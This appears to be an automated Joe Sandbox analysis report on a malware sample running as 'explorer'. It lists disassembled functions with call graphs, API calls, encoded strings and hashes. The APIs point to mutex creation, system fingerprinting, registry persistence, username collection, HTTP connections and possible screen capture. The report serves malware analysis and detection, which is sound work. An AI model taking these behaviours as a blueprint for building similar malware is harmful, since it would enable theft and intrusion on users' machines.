                                                                                                        control_flow_graph 2492 79e430-79e462 call 79dfff call 79e005 call 79e063 2499 79e468-79e474 call 79e00b 2492->2499 2500 79e6c6-79e701 call 78ea55 call 79dfff call 79e005 call 79e063 2492->2500 2499->2500 2505 79e47a-79e484 2499->2505 2529 79e820-79e87c call 78ea55 call 7a6139 2500->2529 2530 79e707-79e713 call 79e00b 2500->2530 2507 79e4bb-79e4bd 2505->2507 2508 79e486 2505->2508 2512 79e4c0-79e4c9 2507->2512 2510 79e488-79e48e 2508->2510 2513 79e4ae-79e4b0 2510->2513 2514 79e490-79e493 2510->2514 2512->2512 2516 79e4cb-79e4e1 call 797e35 2512->2516 2519 79e4b3-79e4b5 2513->2519 2517 79e4aa-79e4ac 2514->2517 2518 79e495-79e49d 2514->2518 2526 79e6b8-79e6be call 797c06 2516->2526 2527 79e4e7-79e502 call 797c06 2516->2527 2517->2519 2518->2513 2523 79e49f-79e4a8 2518->2523 2519->2507 2524 79e6bf-79e6c3 2519->2524 2523->2510 2523->2517 2526->2524 2538 79e505-79e50f 2527->2538 2552 79e87e-79e884 2529->2552 2553 79e886-79e889 2529->2553 2530->2529 2540 79e719-79e725 call 79e037 2530->2540 2538->2538 2541 79e511-79e525 call 79c0f3 2538->2541 2540->2529 2549 79e72b-79e74c call 797c06 GetTimeZoneInformation 2540->2549 2550 79e52b-79e57d call 78b340 * 4 call 79e3e9 2541->2550 2551 79e6c4 2541->2551 2566 79e7fd-79e81f call 79dff7 call 79dfeb call 79dff1 2549->2566 2567 79e752-79e772 2549->2567 2611 79e57e-79e581 2550->2611 2551->2500 2558 79e8d3-79e8e5 2552->2558 2556 79e88b-79e88d 2553->2556 2557 79e88f-79e8a2 call 797e35 2553->2557 2556->2558 2575 79e8ae-79e8c7 call 7a6139 2557->2575 2576 79e8a4 2557->2576 2562 79e8f5 2558->2562 2563 79e8e7-79e8ea 2558->2563 2564 79e8fa-79e90f call 797c06 call 7896b0 2562->2564 2565 79e8f5 call 79e6d1 2562->2565 2563->2562 2570 79e8ec-79e8f3 call 79e430 2563->2570 2565->2564 2572 79e77c-79e784 2567->2572 2573 79e774-79e779 2567->2573 2570->2564 2583 79e796-79e798 2572->2583 2584 79e786-79e78d 2572->2584 2573->2572 2597 79e8c9-79e8ca 2575->2597 2598 79e8cc-79e8cd call 797c06 2575->2598 2586 79e8a5-79e8ac call 797c06 2576->2586 2592 79e79a-79e7fa call 78b340 * 4 call 792427 call 79e910 * 2 2583->2592 2584->2583 2590 79e78f-79e794 2584->2590 2603 79e8d2 2586->2603 2590->2592 2592->2566 2597->2586 2598->2603 2603->2558 2613 79e583 2611->2613 2614 79e586-79e589 2611->2614 2613->2614 2614->2611 2616 79e58b-79e599 2614->2616 2618 79e59b 2616->2618 2619 79e59e-79e5b3 call 7915d1 2616->2619 2618->2619 2626 79e5b6-79e5bc 2619->2626 2628 79e5be-79e5c5 2626->2628 2629 79e5c7-79e5ca 2626->2629 2628->2629 2631 79e5cc-79e5d2 2628->2631 2629->2626 2633 79e5d8-79e603 call 7915d1 2631->2633 2634 79e66c-79e673 2631->2634 2641 79e625-79e62b 2633->2641 2642 79e605-79e609 2633->2642 2636 79e67a-79e68b 2634->2636 2637 79e675-79e677 2634->2637 2639 79e68d-79e6a4 call 79e3e9 2636->2639 2640 79e6a7-79e6b6 call 79dff7 call 79dfeb 2636->2640 2637->2636 2639->2640 2640->2526 2641->2634 2648 79e62d-79e650 call 7915d1 2641->2648 2645 79e60a-79e610 2642->2645 2649 79e622 2645->2649 2650 79e612-79e620 2645->2650 2648->2634 2655 79e652-79e656 2648->2655 2649->2641 2650->2645 2650->2649 2656 79e657-79e65a 2655->2656 2657 79e669 2656->2657 2658 79e65c-79e667 2656->2658 2657->2634 2658->2656 2658->2657
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0079E4ED
                                                                                                        • _free.LIBCMT ref: 0079E6B9
                                                                                                        • _free.LIBCMT ref: 0079E731
                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                        • String ID: M{$Eastern Standard Time$Eastern Summer Time
                                                                                                        • API String ID: 597776487-3830292399
                                                                                                        • Opcode ID: b60694f20f0542979673c31f022695b39bedff497ee48d15f6307fa36dc2862a
                                                                                                        • Instruction ID: ec99a5ef537975431c6bec686a8afb40f2e99964166aca27b76768534ec299ba
                                                                                                        • Opcode Fuzzy Hash: b60694f20f0542979673c31f022695b39bedff497ee48d15f6307fa36dc2862a
                                                                                                        • Instruction Fuzzy Hash: 41A11771900215EBDF20FFA8EC4AAAE7B79EF04710F14416AF501A7291EB399D40C795
                                                                                                        Function 007691B0 Relevance: 6.3, APIs: 4, Instructions: 324libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3619 7691b0-76921a 3620 7692f3 3619->3620 3621 769220-769227 3619->3621 3622 7692f5-7692fb 3620->3622 3623 769230-769247 3621->3623 3624 76932c-769332 3622->3624 3625 7692fd-769309 3622->3625 3626 7693bd call 784450 3623->3626 3627 76924d-76926e call 783f40 3623->3627 3632 769334-76933f 3624->3632 3633 76935b-769373 3624->3633 3628 76931f-769329 call 789d26 3625->3628 3629 76930b-769319 3625->3629 3636 7693c2-769452 call 78ea38 call 78b340 GetVersionExW 3626->3636 3646 769270-76927e 3627->3646 3647 76929e-7692e2 call 7858c0 3627->3647 3628->3624 3629->3628 3629->3636 3639 769351-769358 call 789d26 3632->3639 3640 769341-76934f 3632->3640 3634 769375-769381 3633->3634 3635 76939d-7693bc call 7896b0 3633->3635 3642 769393-76939a call 789d26 3634->3642 3643 769383-769391 3634->3643 3665 7699f6-769a13 call 7896b0 3636->3665 3666 769458-769480 call 783030 call 7661f0 3636->3666 3639->3633 3640->3636 3640->3639 3642->3635 3643->3636 3643->3642 3653 769294-76929b call 789d26 3646->3653 3654 769280-76928e 3646->3654 3647->3622 3661 7692e4-7692e9 3647->3661 3653->3647 3654->3636 3654->3653 3661->3620 3664 7692eb-7692ee 3661->3664 3664->3623 3673 769484-7694a6 call 783030 call 7661f0 3666->3673 3674 769482 3666->3674 3679 7694aa-7694c3 GetModuleHandleA GetProcAddress 3673->3679 3680 7694a8 3673->3680 3674->3673 3681 7694f4-76951f 3679->3681 3682 7694c5-7694d4 3679->3682 3680->3679 3685 769550-769571 3681->3685 3686 769521-769530 3681->3686 3683 7694d6-7694e4 3682->3683 3684 7694ea-7694f1 call 789d26 3682->3684 3683->3684 3687 769a14 call 78ea38 3683->3687 3684->3681 3691 769577 GetSystemInfo 3685->3691 3692 769573-769575 GetNativeSystemInfo 3685->3692 3689 769546-76954d call 789d26 3686->3689 3690 769532-769540 3686->3690 3697 769a19-769a1f call 78ea38 3687->3697 3689->3685 3690->3687 3690->3689 3696 76957d-769586 3691->3696 3692->3696 3699 7695a4-7695a7 3696->3699 3700 769588-76958f 3696->3700 3701 769997-76999a 3699->3701 3702 7695ad-7695b6 3699->3702 3704 769595-76959f 3700->3704 3705 7699f1 3700->3705 3701->3705 3709 76999c-7699a5 3701->3709 3707 7695b8-7695c4 3702->3707 3708 7695c9-7695cc 3702->3708 3706 7699ec 3704->3706 3705->3665 3706->3705 3707->3706 3711 769974-769976 3708->3711 3712 7695d2-7695d9 3708->3712 3713 7699a7-7699ab 3709->3713 3714 7699cc-7699cf 3709->3714 3721 769984-769987 3711->3721 3722 769978-769982 3711->3722 3715 7695df-769647 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 3712->3715 3716 7696b9-76995d call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 3712->3716 3717 7699c0-7699ca 3713->3717 3718 7699ad-7699b2 3713->3718 3719 7699d1-7699db 3714->3719 3720 7699dd-7699e9 3714->3720 3746 76964b-76966b call 79189f 3715->3746 3747 769649 3715->3747 3757 769963-76996c 3716->3757 3717->3705 3718->3717 3725 7699b4-7699be 3718->3725 3719->3705 3720->3706 3721->3705 3723 769989-769995 3721->3723 3722->3706 3723->3706 3725->3705 3752 7696a2-7696a4 3746->3752 3753 76966d-76967c 3746->3753 3747->3746 3752->3757 3758 7696aa-7696b4 3752->3758 3755 769692-76969f call 789d26 3753->3755 3756 76967e-76968c 3753->3756 3755->3752 3756->3697 3756->3755 3757->3701 3762 76996e 3757->3762 3758->3757 3762->3711
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167034304-0
                                                                                                        • Opcode ID: 05b56364b8fa6857bb8ccbd65c4a5580d87836f3f27be60b54f400e4a6cd0010
                                                                                                        • Instruction ID: 251fce4ade41c2fb6582ee10a30ec6c1a170015eeadfd805ee4b9891aa0b9f78
                                                                                                        • Opcode Fuzzy Hash: 05b56364b8fa6857bb8ccbd65c4a5580d87836f3f27be60b54f400e4a6cd0010
                                                                                                        • Instruction Fuzzy Hash: A1C1F871E00204DBDB14DF68CD89BADBB79EF45310F548258E9069B3C6EB39DA84CB91
                                                                                                        Function 0077E420 Relevance: 51.4, APIs: 4, Strings: 24, Instructions: 2430registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00770370: Sleep.KERNELBASE(000005DC,3F07E9DB,?,00000000), ref: 00770402
                                                                                                          • Part of subcall function 00770370: InternetOpenW.WININET(007BCC10,00000000,00000000,00000000,00000000), ref: 00770411
                                                                                                          • Part of subcall function 00770370: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00770435
                                                                                                          • Part of subcall function 00770370: HttpOpenRequestA.WININET(?,00000000), ref: 0077047F
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                        • RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • GetUserNameA.ADVAPI32(?,80000002), ref: 0077F1E2
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0077F26D
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                          • Part of subcall function 007661F0: GdiplusStartup.GDIPLUS(?,?,00000000,3F07E9DB,00000000), ref: 00766DEA
                                                                                                          • Part of subcall function 007661F0: GetDC.USER32(00000000), ref: 00766F62
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
                                                                                                        • String ID: 0EQ $246122658369$776334$Ju==$OQUAOo==$QEC+$QEG+$R$System$ZVO $ZVy $Zka $bUG $c03 $c1C $cFO $d0G $d1Gceo==$dEC $dhQ=$eUU $elC $invalid stoi argument$stoi argument out of range
                                                                                                        • API String ID: 2912196086-2989987621
                                                                                                        • Opcode ID: 4d5bf5f9c9c6328549280ec56d6058cd51398fbfad78ddc0d2291731485686e3
                                                                                                        • Instruction ID: aef0be7f8ef54c64b1d53288e5d2c65774bd3b6c5aff60c254209d18be4ac916
                                                                                                        • Opcode Fuzzy Hash: 4d5bf5f9c9c6328549280ec56d6058cd51398fbfad78ddc0d2291731485686e3
                                                                                                        • Instruction Fuzzy Hash: 03131571A001489BEF19EB68CD897DDBB76AF42304F5481D8E009A72D7EB395FC48B91
                                                                                                        Function 0076C6D0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 335sleepsynchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2659 76c6d0-76c704 Sleep CreateMutexA GetLastError 2660 76c706-76c708 2659->2660 2661 76c717-76c718 2659->2661 2660->2661 2662 76c70a-76c715 GetLastError 2660->2662 2662->2661 2663 76c719-76c778 call 78dc4e call 76aca0 call 76a940 2662->2663 2670 76c77c-76c789 SetCurrentDirectoryA 2663->2670 2671 76c77a 2663->2671 2672 76c7b7-76c8b3 call 783030 call 7661f0 call 783030 call 7661f0 call 783030 call 7661f0 call 7845e0 call 785430 call 7845e0 call 782eb0 call 785430 call 768e10 2670->2672 2673 76c78b-76c797 2670->2673 2671->2670 2709 76c8b5-76c8c1 2672->2709 2710 76c8e1-76c8e7 2672->2710 2674 76c7ad-76c7b4 call 789d26 2673->2674 2675 76c799-76c7a7 2673->2675 2674->2672 2675->2674 2677 76cae4 call 78ea38 2675->2677 2683 76cae9 call 78ea38 2677->2683 2688 76caee-76caf3 call 78ea38 2683->2688 2711 76c8d7-76c8de call 789d26 2709->2711 2712 76c8c3-76c8d1 2709->2712 2713 76c915-76c92d 2710->2713 2714 76c8e9-76c8f5 2710->2714 2711->2710 2712->2683 2712->2711 2718 76c92f-76c93b 2713->2718 2719 76c95b-76c973 2713->2719 2716 76c8f7-76c905 2714->2716 2717 76c90b-76c912 call 789d26 2714->2717 2716->2683 2716->2717 2717->2713 2720 76c951-76c958 call 789d26 2718->2720 2721 76c93d-76c94b 2718->2721 2722 76c9a4-76c9c2 2719->2722 2723 76c975-76c984 2719->2723 2720->2719 2721->2683 2721->2720 2729 76c9c4-76c9d3 2722->2729 2730 76c9f3-76ca17 2722->2730 2727 76c986-76c994 2723->2727 2728 76c99a-76c9a1 call 789d26 2723->2728 2727->2683 2727->2728 2728->2722 2736 76c9d5-76c9e3 2729->2736 2737 76c9e9-76c9f0 call 789d26 2729->2737 2732 76ca48-76ca6c 2730->2732 2733 76ca19-76ca28 2730->2733 2740 76ca6e-76ca7d 2732->2740 2741 76ca99-76ca9f 2732->2741 2738 76ca3e-76ca45 call 789d26 2733->2738 2739 76ca2a-76ca38 2733->2739 2736->2683 2736->2737 2737->2730 2738->2732 2739->2683 2739->2738 2745 76ca8f-76ca96 call 789d26 2740->2745 2746 76ca7f-76ca8d 2740->2746 2747 76caa1-76caad 2741->2747 2748 76cac9-76cae3 call 7896b0 2741->2748 2745->2741 2746->2683 2746->2745 2753 76cabf-76cac6 call 789d26 2747->2753 2754 76caaf-76cabd 2747->2754 2753->2748 2754->2688 2754->2753
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0076C6D3
                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007C6494), ref: 0076C6F1
                                                                                                        • GetLastError.KERNEL32 ref: 0076C6F9
                                                                                                        • GetLastError.KERNEL32 ref: 0076C70A
                                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,3F07E9DB,00000000,00000000), ref: 0076C77D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateCurrentDirectoryMutexSleep
                                                                                                        • String ID: KgOkTPdq4Az=
                                                                                                        • API String ID: 1684129806-3565932714
                                                                                                        • Opcode ID: 759002a8ce1d836d21a862c590ad94ed968463a2cf6630221a51ad1a3b0b816d
                                                                                                        • Instruction ID: 68c6ab485756ef628c11f21c600b38e260bd7583603cbb731ba48ecb4f5b627d
                                                                                                        • Opcode Fuzzy Hash: 759002a8ce1d836d21a862c590ad94ed968463a2cf6630221a51ad1a3b0b816d
                                                                                                        • Instruction Fuzzy Hash: B2B11F71A00248DBEB19E778CD49BADBB72EF85300F54825CE449A73D7EB3D5A808B51
                                                                                                        Function 0079E6D1 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 167timeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2759 79e6d1-79e701 call 79dfff call 79e005 call 79e063 2766 79e820-79e87c call 78ea55 call 7a6139 2759->2766 2767 79e707-79e713 call 79e00b 2759->2767 2779 79e87e-79e884 2766->2779 2780 79e886-79e889 2766->2780 2767->2766 2772 79e719-79e725 call 79e037 2767->2772 2772->2766 2778 79e72b-79e74c call 797c06 GetTimeZoneInformation 2772->2778 2791 79e7fd-79e81f call 79dff7 call 79dfeb call 79dff1 2778->2791 2792 79e752-79e772 2778->2792 2784 79e8d3-79e8e5 2779->2784 2782 79e88b-79e88d 2780->2782 2783 79e88f-79e8a2 call 797e35 2780->2783 2782->2784 2798 79e8ae-79e8c7 call 7a6139 2783->2798 2799 79e8a4 2783->2799 2787 79e8f5 2784->2787 2788 79e8e7-79e8ea 2784->2788 2789 79e8fa-79e90f call 797c06 call 7896b0 2787->2789 2790 79e8f5 call 79e6d1 2787->2790 2788->2787 2794 79e8ec-79e8f3 call 79e430 2788->2794 2790->2789 2796 79e77c-79e784 2792->2796 2797 79e774-79e779 2792->2797 2794->2789 2806 79e796-79e798 2796->2806 2807 79e786-79e78d 2796->2807 2797->2796 2818 79e8c9-79e8ca 2798->2818 2819 79e8cc-79e8cd call 797c06 2798->2819 2808 79e8a5-79e8ac call 797c06 2799->2808 2813 79e79a-79e7fa call 78b340 * 4 call 792427 call 79e910 * 2 2806->2813 2807->2806 2812 79e78f-79e794 2807->2812 2822 79e8d2 2808->2822 2812->2813 2813->2791 2818->2808 2819->2822 2822->2784
                                                                                                        APIs
                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        • _free.LIBCMT ref: 0079E731
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 0079E8FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                        • String ID: M{$Eastern Standard Time$Eastern Summer Time
                                                                                                        • API String ID: 2155170405-3830292399
                                                                                                        • Opcode ID: 8965b96e051b9829e7650a8c843a9843f7b0a39ea5bdb14bf683325bb7e8d768
                                                                                                        • Instruction ID: 57dc3659b215b8af5feafd6acbe0289504d08289312e7247a649cb1f6195d244
                                                                                                        • Opcode Fuzzy Hash: 8965b96e051b9829e7650a8c843a9843f7b0a39ea5bdb14bf683325bb7e8d768
                                                                                                        • Instruction Fuzzy Hash: A951CB71900225EBCF20FFA9EC4AE9E7F78EF05760B10856AF414A7151EB78AD40CB95
                                                                                                        Function 0079021C Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2838 79021c-790251 GetFileType 2839 790309-79030c 2838->2839 2840 790257-790262 2838->2840 2843 79030e-790311 2839->2843 2844 790335-79035d 2839->2844 2841 790284-7902a0 call 78b340 GetFileInformationByHandle 2840->2841 2842 790264-790275 call 790592 2840->2842 2855 790326-790333 GetLastError call 790c3c 2841->2855 2859 7902a6-7902e8 call 7904e4 call 79038c * 3 2841->2859 2857 79027b-790282 2842->2857 2858 790322-790324 2842->2858 2843->2844 2849 790313-790315 2843->2849 2845 79037a-79037c 2844->2845 2846 79035f-790372 PeekNamedPipe 2844->2846 2851 79037d-79038b call 7896b0 2845->2851 2846->2845 2850 790374-790377 2846->2850 2854 790317-79031c call 790c72 2849->2854 2849->2855 2850->2845 2854->2858 2855->2858 2857->2841 2858->2851 2872 7902ed-790305 call 7904b1 2859->2872 2872->2845 2875 790307 2872->2875 2875->2858
                                                                                                        APIs
                                                                                                        • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0079014E), ref: 0079023E
                                                                                                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00790298
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0079014E,?,000000FF,00000000,00000000), ref: 00790326
                                                                                                        • __dosmaperr.LIBCMT ref: 0079032D
                                                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0079036A
                                                                                                          • Part of subcall function 00790592: __dosmaperr.LIBCMT ref: 007905C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1206951868-0
                                                                                                        • Opcode ID: e62ecb8059cfb4891c179294538302c72bc624fecb97330b9a7550f62f0dd201
                                                                                                        • Instruction ID: dd903295cb299b9f41f2c1c11fc60bc2dece158eb5a6b18a901f8fc2700d9876
                                                                                                        • Opcode Fuzzy Hash: e62ecb8059cfb4891c179294538302c72bc624fecb97330b9a7550f62f0dd201
                                                                                                        • Instruction Fuzzy Hash: 9A412C75920608AFCF249FB5EC499AFBBF9EF89300B10851DF956D3611E7389900CBA0
                                                                                                        Function 0079E82B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
